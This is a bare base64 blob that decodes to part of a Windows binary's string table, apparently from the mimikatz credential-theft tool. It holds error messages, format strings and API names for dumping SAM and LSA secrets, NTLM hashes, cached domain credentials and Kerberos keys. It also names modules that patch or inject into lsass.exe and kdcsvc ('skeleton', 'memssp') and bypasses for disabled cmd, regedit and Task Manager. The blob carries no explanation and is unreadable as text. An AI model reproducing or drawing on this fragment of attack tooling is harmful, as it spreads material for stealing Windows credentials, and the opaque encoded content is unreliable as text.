AHMAdAByAHkAXwBSAGUAZwBRAHUAZQByAHkAVgBhAGwAdQBlAEUAeAAgAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlACAASwBPAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEMAbwBtAHAAdQB0AGUAcgBBAG4AZABTAHkAcwBrAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAQwBvAG0AcAB1AHQAZQByAE4AYQBtAGUAIABLAE8ACgAAAFMAeQBzAEsAZQB5ACAAOgAgAAAAQwBvAG4AdAByAG8AbABcAEwAUwBBAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAQwBvAG0AcAB1AHQAZQByAEEAbgBkAFMAeQBzAGsAZQB5ACAAOwAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFMAeQBzAGsAZQB5ACAASwBPAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABDAG8AbQBwAHUAdABlAHIAQQBuAGQAUwB5AHMAawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAZwBpAHMAdAByAHkAXwBSAGUAZwBPAHAAZQBuAEsAZQB5AEUAeAAgAEwAUwBBACAASwBPAAoAAAAAAFMAQQBNAFwARABvAG0AYQBpAG4AcwBcAEEAYwBjAG8AdQBuAHQAAABVAHMAZQByAHMAAABOAGEAbQBlAHMAAAAKAFIASQBEACAAIAA6ACAAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAVgAAAFUAcwBlAHIAIAA6ACAAJQAuACoAcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAVQBzAGUAcgBzAEEAbgBkAFMAYQBtAEsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIABWACAASwBPAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABwAHIAZQAgAC0AIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAAVgAgAEsATwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAVQBzAGUAcgBzAEEAbgBkAFMAYQBtAEsAZQB5ACAAOwAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEsAZQAgAEsATwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAUwBBAE0AIABBAGMAYwBvAHUAbgB0AHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAATgBUAEwATQAAAAAATABNACAAIAAAAAAAJQBzACAAOgAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQASABhAHMAaAAgADsAIABSAHQAbABEAGUAYwByAHkAcAB0AEQARQBTADIAYgBsAG8AYwBrAHMAMQBEAFcATwBSAEQAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQASABhAHMAaAAgADsAIABSAHQAbABFAG4AYwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAQQBSAEMANAAAAAAACgBTAEEATQBLAGUAeQAgADoAIAAAAAAARgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFMAYQBtAEsAZQB5ACAAOwAgAFIAdABsAEUAbgBjAHIAeQBwAHQARABlAGMAcgB5AHAAdABBAFIAQwA0ACAASwBPAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFMAYQBtAEsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIABGACAASwBPAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFMAYQBtAEsAZQB5ACAAOwAgAHAAcgBlACAALQAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIABGACAASwBPAAAAUABvAGwAaQBjAHkAAAAAAFAAbwBsAFIAZQB2AGkAcwBpAG8AbgAAAAoAUABvAGwAaQBjAHkAIABzAHUAYgBzAHkAcwB0AGUAbQAgAGkAcwAgADoAIAAlAGgAdQAuACUAaAB1AAoAAABQAG8AbABFAEsATABpAHMAdAAAAFAAbwBsAFMAZQBjAHIAZQB0AEUAbgBjAHIAeQBwAHQAaQBvAG4ASwBlAHkAAAAAAEwAUwBBACAASwBlAHkAKABzACkAIAA6ACAAJQB1ACwAIABkAGUAZgBhAHUAbAB0ACAAAAAgACAAWwAlADAAMgB1AF0AIAAAACAAAABMAFMAQQAgAEsAZQB5ACAAOgAgAAAAAABTAGUAYwByAGUAdABzAAAAcwBlAHIAdgBpAGMAZQBzAAAAAAAKAFMAZQBjAHIAZQB0ACAAIAA6ACAAJQBzAAAAXwBTAEMAXwAAAAAAQwB1AHIAcgBWAGEAbAAAAAoAYwB1AHIALwAAAE8AbABkAFYAYQBsAAAAAAAKAG8AbABkAC8AAABTAGUAYwByAGUAdABzAFwATgBMACQASwBNAFwAQwB1AHIAcgBWAGEAbAAAAEMAYQBjAGgAZQAAAE4ATAAkAEkAdABlAHIAYQB0AGkAbwBuAEMAbwB1AG4AdAAAACoAIABOAEwAJABJAHQAZQByAGEAdABpAG8AbgBDAG8AdQBuAHQAIABpAHMAIAAlAHUALAAgACUAdQAgAHIAZQBhAGwAIABpAHQAZQByAGEAdABpAG8AbgAoAHMAKQAKAAAAAAAqACAARABDAEMAMQAgAG0AbwBkAGUAIAAhAAoAAAAAAAAAAAAqACAASQB0AGUAcgBhAHQAaQBvAG4AIABpAHMAIABzAGUAdAAgAHQAbwAgAGQAZQBmAGEAdQBsAHQAIAAoADEAMAAyADQAMAApAAoAAAAAAE4ATAAkAEMAbwBuAHQAcgBvAGwAAAAAAAoAWwAlAHMAIAAtACAAAABdAAoAUgBJAEQAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AE4ATABLAE0AUwBlAGMAcgBlAHQAQQBuAGQAQwBhAGMAaABlACAAOwAgAEMAcgB5AHAAdABEAGUAYwByAHkAcAB0ACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABOAEwASwBNAFMAZQBjAHIAZQB0AEEAbgBkAEMAYQBjAGgAZQAgADsAIABDAHIAeQBwAHQAUwBlAHQASwBlAHkAUABhAHIAYQBtACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABOAEwASwBNAFMAZQBjAHIAZQB0AEEAbgBkAEMAYQBjAGgAZQAgADsAIABDAHIAeQBwAHQASQBtAHAAbwByAHQASwBlAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABOAEwASwBNAFMAZQBjAHIAZQB0AEEAbgBkAEMAYQBjAGgAZQAgADsAIABSAHQAbABFAG4AYwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAUgBDADQAIAA6ACAAMAB4ACUAMAA4AHgACgAAAFUAcwBlAHIAIAAgACAAIAAgACAAOgAgACUALgAqAHMAXAAlAC4AKgBzAAoAAAAAAE0AcwBDAGEAYwBoAGUAVgAlAGMAIAA6ACAAAABPAGIAagBlAGMAdABOAGEAbQBlAAAAAAAAAAAAIAAvACAAcwBlAHIAdgBpAGMAZQAgACcAJQBzACcAIAB3AGkAdABoACAAdQBzAGUAcgBuAGEAbQBlACAAOgAgACUAcwAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABlAGMAcgB5AHAAdABTAGUAYwByAGUAdAAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAAUwBlAGMAcgBlAHQAIAB2AGEAbAB1AGUAIABLAE8ACgAAACQATQBBAEMASABJAE4ARQAuAEEAQwBDAAAAAABOAFQATABNADoAAAAvAAAAdABlAHgAdAA6ACAAJQB3AFoAAABoAGUAeAAgADoAIAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAF8AYQBlAHMAMgA1ADYAIAA7ACAAQwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAF8AYQBlAHMAMgA1ADYAIAA7ACAAQwByAHkAcAB0AEkAbQBwAG8AcgB0AEsAZQB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFNhbUlDb25uZWN0AFNhbXJDbG9zZUhhbmRsZQBTYW1JUmV0cmlldmVQcmltYXJ5Q3JlZGVudGlhbHMAAFNhbXJPcGVuRG9tYWluAABTYW1yT3BlblVzZXIAAAAAU2FtclF1ZXJ5SW5mb3JtYXRpb25Vc2VyAAAAAFNhbUlGcmVlX1NBTVBSX1VTRVJfSU5GT19CVUZGRVIATHNhSVF1ZXJ5SW5mb3JtYXRpb25Qb2xpY3lUcnVzdGVkAAAATHNhSUZyZWVfTFNBUFJfUE9MSUNZX0lORk9STUFUSU9OAAAAVmlydHVhbEFsbG9jAAAAAExvY2FsRnJlZQAAAG1lbWNweQAAcABhAHQAYwBoAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABrAHUAbABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAdABWAGUAcgB5AEIAYQBzAGkAYwBNAG8AZAB1AGwAZQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwBGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAABpAG4AagBlAGMAdAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUACgAAAAAARABvAG0AYQBpAG4AIAA6ACAAJQB3AFoAIAAvACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAIAA7ACAAUwBhAG0ATABvAG8AawB1AHAASQBkAHMASQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhACAAOwAgACcAJQBzACcAIABpAHMAIABuAG8AdAAgAGEAIAB2AGEAbABpAGQAIABJAGQACgAAAAAAbgBhAG0AZQAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAE4AYQBtAGUAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBVAHMAZQByAHMASQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBPAHAAZQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBDAG8AbgBuAGUAYwB0ACAAJQAwADgAeAAKAAAAUwBhAG0AUwBzAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhAF8AZwBlAHQASABhAG4AZABsAGUAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhAF8AZwBlAHQASABhAG4AZABsAGUAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AZwBlAHQAVQBuAGkAcQB1AGUARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAKAFIASQBEACAAIAA6ACAAJQAwADgAeAAgACgAJQB1ACkACgBVAHMAZQByACAAOgAgACUAdwBaAAoAAABMAE0AIAAgACAAOgAgAAAACgBOAFQATABNACAAOgAgAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQBfAHUAcwBlAHIAIAA7ACAAUwBhAG0AUQB1AGUAcgB5AEkAbgBmAG8AcgBtAGEAdABpAG8AbgBVAHMAZQByACAAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhAF8AdQBzAGUAcgAgADsAIABTAGEAbQBPAHAAZQBuAFUAcwBlAHIAIAAlADAAOAB4AAoAAAB1AG4AawBuAG8AdwBuAAAACgAgACoAIAAlAHMACgAAACAAIAAgACAATABNACAAIAAgADoAIAAAAAoAIAAgACAAIABOAFQATABNACAAOgAgAAAAAAAgACAAIAAgACUALgAqAHMACgAAACAAIAAgACAAJQAwADIAdQAgACAAAAAAACAAIAAgACAARABlAGYAYQB1AGwAdAAgAFMAYQBsAHQAIAA6ACAAJQAuACoAcwAKAAAAAABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAAABPAGwAZABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAACAAIAAgACAARABlAGYAYQB1AGwAdAAgAFMAYQBsAHQAIAA6ACAAJQAuACoAcwAKACAAIAAgACAARABlAGYAYQB1AGwAdAAgAEkAdABlAHIAYQB0AGkAbwBuAHMAIAA6ACAAJQB1AAoAAAAAAFMAZQByAHYAaQBjAGUAQwByAGUAZABlAG4AdABpAGEAbABzAAAAAABPAGwAZABlAHIAQwByAGUAZABlAG4AdABpAGEAbABzAAAAAAAgACAAIAAgACUAcwAKAAAAIAAgACAAIAAgACAAJQBzACAAOgAgAAAAIAAgACAAIAAgACAAJQBzACAAKAAlAHUAKQAgADoAIAAAAAAAbQBzAHYAYwByAHQALgBkAGwAbAAAAAAAYQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbgBnAAAAAABkAGkAcwBjAG8AdgBlAHIAaQBuAGcAAABhAHMAcwBvAGMAaQBhAHQAaQBuAGcAAABkAGkAcwBjAG8AbgBuAGUAYwB0AGUAZAAAAAAAZABpAHMAYwBvAG4AbgBlAGMAdABpAG4AZwAAAGEAZABfAGgAbwBjAF8AbgBlAHQAdwBvAHIAawBfAGYAbwByAG0AZQBkAAAAYwBvAG4AbgBlAGMAdABlAGQAAABuAG8AdABfAHIAZQBhAGQAeQAAAHMAawBlAGwAZQB0AG8AbgAAAAAAbQBlAG0AcwBzAHAAAAAAAHcAaQBmAGkAAAAAAFsAZQB4AHAAZQByAGkAbQBlAG4AdABhAGwAXQAgAFQAcgB5ACAAdABvACAAZQBuAHUAbQBlAHIAYQB0AGUAIABhAGwAbAAgAG0AbwBkAHUAbABlAHMAIAB3AGkAdABoACAARABlAHQAbwB1AHIAcwAtAGwAaQBrAGUAIABoAG8AbwBrAHMAAABkAGUAdABvAHUAcgBzAAAASgB1AG4AaQBwAGUAcgAgAE4AZQB0AHcAbwByAGsAIABDAG8AbgBuAGUAYwB0ACAAKAB3AGkAdABoAG8AdQB0ACAAcgBvAHUAdABlACAAbQBvAG4AaQB0AG8AcgBpAG4AZwApAAAAAABuAGMAcgBvAHUAdABlAG0AbwBuAAAAAABUAGEAcwBrACAATQBhAG4AYQBnAGUAcgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAoAHcAaQB0AGgAbwB1AHQAIABEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAKQAAAAAAdABhAHMAawBtAGcAcgAAAAAAAABSAGUAZwBpAHMAdAByAHkAIABFAGQAaQB0AG8AcgAgACAAIAAgACAAIAAgACAAIAAoAHcAaQB0AGgAbwB1AHQAIABEAGkAcwBhAGIAbABlAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAKQAAAAAAcgBlAGcAZQBkAGkAdAAAAEMAbwBtAG0AYQBuAGQAIABQAHIAbwBtAHAAdAAgACAAIAAgACAAIAAgACAAIAAgACgAdwBpAHQAaABvAHUAdAAgAEQAaQBzAGEAYgBsAGUAQwBNAEQAKQAAAAAAYwBtAGQAAABNAGkAcwBjAGUAbABsAGEAbgBlAG8AdQBzACAAbQBvAGQAdQBsAGUAAAAAAG0AaQBzAGMAAAAAAHcAbABhAG4AYQBwAGkAAABXbGFuT3BlbkhhbmRsZQAAV2xhbkNsb3NlSGFuZGxlAFdsYW5FbnVtSW50ZXJmYWNlcwAAV2xhbkdldFByb2ZpbGVMaXN0AABXbGFuR2V0UHJvZmlsZQAAV2xhbkZyZWVNZW1vcnkAAEsAaQB3AGkAQQBuAGQAQwBNAEQAAAAAAEQAaQBzAGEAYgBsAGUAQwBNAEQAAAAAAGMAbQBkAC4AZQB4AGUAAABLAGkAdwBpAEEAbgBkAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAAAAAAEQAaQBzAGEAYgBsAGUAUgBlAGcAaQBzAHQAcgB5AFQAbwBvAGwAcwAAAAAAcgBlAGcAZQBkAGkAdAAuAGUAeABlAAAASwBpAHcAaQBBAG4AZABUAGEAcwBrAE0AZwByAAAAAABEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAAAAAAHQAYQBzAGsAbQBnAHIALgBlAHgAZQAAAGQAcwBOAGMAUwBlAHIAdgBpAGMAZQAAAAkAKAAlAHcAWgApAAAAAAAJAFsAJQB1AF0AIAAlAHcAWgAgACEAIAAAAAAAJQAtADMAMgBTAAAAIwAgACUAdQAAAAAACQAgACUAcAAgAC0APgAgACUAcAAAAAAAJQB3AFoAIAAoACUAdQApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AZABlAHQAbwB1AHIAcwBfAGMAYQBsAGwAYgBhAGMAawBfAHAAcgBvAGMAZQBzAHMAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFAAYQB0AGMAaAAgAE8ASwAgAGYAbwByACAAJwAlAHMAJwAgAGYAcgBvAG0AIAAnACUAcwAnACAAdABvACAAJwAlAHMAJwAgAEAAIAAlAHAACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBnAGUAbgBlAHIAaQBjAF8AbgBvAGcAcABvAF8AcABhAHQAYwBoACAAOwAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoACAAKAAwAHgAJQAwADgAeAApAAoAAAAAACAAKgAgAAAAIAAvACAAJQBzACAALQAgACUAcwAKAAAACQB8ACAAJQBzAAoAAAAAAGZvcGVuAAAAZndwcmludGYAAAAAZmNsb3NlAABsAHMAYQBzAHMALgBlAHgAZQAAAG0AcwB2ADEAXwAwAC4AZABsAGwAAAAAAEkAbgBqAGUAYwB0AGUAZAAgAD0AKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAtACAAVAByAGEAbQBwAG8AbABpAG4AZQAgAG4AMAAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAEMAbwBkAGUAVwBpAHQAdABoAFAAYQB0AHQAZQByAG4AUgBlAHAAbABhAGMAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAALQAgAFQAcgBhAG0AcABvAGwAaQBuAGUAIABuADEAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAALQAgAHIAZQBhAGwAIABhAHMAbQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBtAGUAbQBzAHMAcAAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AcwBlAGEAcgBjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBtAGUAbQBzAHMAcAAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFAAcgBvAGMAZQBzAHMASQBkAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAExvY2FsQWxsb2MAAGsAZABjAHMAdgBjAC4AZABsAGwAAAAAAFsASwBEAEMAXQAgAGQAYQB0AGEACgAAAFsASwBEAEMAXQAgAHMAdAByAHUAYwB0AAoAAABbAEsARABDAF0AIABrAGUAeQBzACAAcABhAHQAYwBoACAATwBLAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBzAGsAZQBsAGUAdABvAG4AIAA7ACAAUwBlAGMAbwBuAGQAIABwAGEAdAB0AGUAcgBuACAAbgBvAHQAIABmAG8AdQBuAGQACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AcwBrAGUAbABlAHQAbwBuACAAOwAgAEYAaQByAHMAdAAgAHAAYQB0AHQAZQByAG4AIABuAG8AdAAgAGYAbwB1AG4AZAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAHMAawBlAGwAZQB0AG8AbgAgADsAIABrAHUAbABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAdABWAGUAcgB5AEIAYQBzAGkAYwBNAG8AZAB1AGwAZQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwBGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAABjAHIAeQBwAHQAZABsAGwALgBkAGwAbAAAAAAAWwBSAEMANABdACAAZgB1AG4AYwB0AGkAbwBuAHMACgAAAAAAWwBSAEMANABdACAAaQBuAGkAdAAgAHAAYQB0AGMAaAAgAE8ASwAKAAAAAABbAFIAQwA0AF0AIABkAGUAYwByAHkAcAB0ACAAcABhAHQAYwBoACAATwBLAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AcwBrAGUAbABlAHQAbwBuACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAYwByAGUAYQB0AGUAIAByAGUAbQBvAHQAZQAgAGYAdQBuAGMAdABpAG8AbgBzAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBzAGsAZQBsAGUAdABvAG4AIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAGcAcgBvAHUAcAAAAGwAbwBjAGEAbABnAHIAbwB1AHAAAAAAAG4AZQB0AAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAE8AcABlAG4ARABvAG0AYQBpAG4AIABCAHUAaQBsAHQAaQBuACAAKAA/ACkAIAAlADAAOAB4AAoAAAAKAEQAbwBtAGEAaQBuACAAbgBhAG0AZQAgADoAIAAlAHcAWgAAAAAACgBEAG8AbQBhAGkAbgAgAFMASQBEACAAIAA6ACAAAAAKACAAJQAtADUAdQAgACUAdwBaAAAAAAAKACAAfAAgACUALQA1AHUAIAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBMAG8AbwBrAHUAcABJAGQAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEcAZQB0AEcAcgBvAHUAcABzAEYAbwByAFUAcwBlAHIAIAAlADAAOAB4AAAAAAAKACAAfABgACUALQA1AHUAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEcAZQB0AEEAbABpAGEAcwBNAGUAbQBiAGUAcgBzAGgAaQBwACAAJQAwADgAeAAAAAAACgAgAHwAtAAlAC0ANQB1ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0AUgBpAGQAVABvAFMAaQBkACAAJQAwADgAeAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAE8AcABlAG4AVQBzAGUAcgAgACUAMAA4AHgAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBVAHMAZQByAHMASQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ATwBwAGUAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEQAbwBtAGEAaQBuAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBEAG8AbQBhAGkAbgBzAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgACgAAAAAAAA